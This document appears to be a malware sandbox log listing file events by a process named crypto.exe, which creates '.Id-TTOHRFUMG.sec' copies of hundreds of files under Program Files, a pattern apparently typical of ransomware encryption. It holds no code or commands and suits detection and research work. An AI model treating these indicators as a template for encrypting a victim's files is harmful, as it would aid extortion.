File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199429.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-options-keymap.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\management.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\18.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\msvcr100.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\44.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00814_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ERROR.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\WriteConvertTo.ocx.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Menominee.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01293_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\REPLTMPL.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\POSTCARD.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\7z.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198447.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME35.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WINWORD.DEV.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0088542.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\info.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lord_Howe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Media Renderer\connectionmanager_dmr.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\lt.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\Whistling.wav.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\DELETE.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7FR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\hr.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\7zG.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_pressed.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-image-mask.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\JavaAccessBridge-64.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\2 Top.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pl.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_hover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00505_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\settings.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\info.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00274_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281630.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18248_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197983.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292248.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00183_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL075.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Training.potx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN108.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPQUOT.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\QUERIES\MSN MoneyCentral Investor Major Indicies.iqy.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libwave_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2iexp.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107528.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0293800.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297269.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01866_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLMAILR.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.JS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\PAWPRINT.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00405_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\TECHTOOL.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14755_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OUTLFLTR.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\instrument.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\OriginResume.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_no.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_top.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107158.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\nb.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\setup_wm.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_postage_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\misc.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BUSINESS.ONE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.Infopath.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLTASKR.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Library\EUROTOOL.XLAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\mux\libmux_dummy_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\flyout.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\javafx.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09031_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00194_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OARTCONV.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSTH7FR.LEX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_hover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\decora-sse.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15132_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\FAX\OriginFax.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14754_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\EXLIRM.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\FiveRules.potx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01039_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107744.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Style\GB.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Moscow.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_GreenTea.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL093.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libcrystalhd_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Casey.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239975.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\WidescreenPresentation.potx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libadpcm_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over_BIDI.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00799_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18207_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLPERF.INI.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\services_discovery\libmicrodns_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301044.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01268_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\XOCR3.PSP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-progress.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-execution.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199475.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Priority.accft.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libequalizer_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196110.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01395_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIGN.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-io-ui.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\resources.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_photo_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185776.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199465.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OEMPRINT.CAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\qipcap64.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107192.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107450.WMF.Id-TTOHRFUMG.sec	crypto.exe
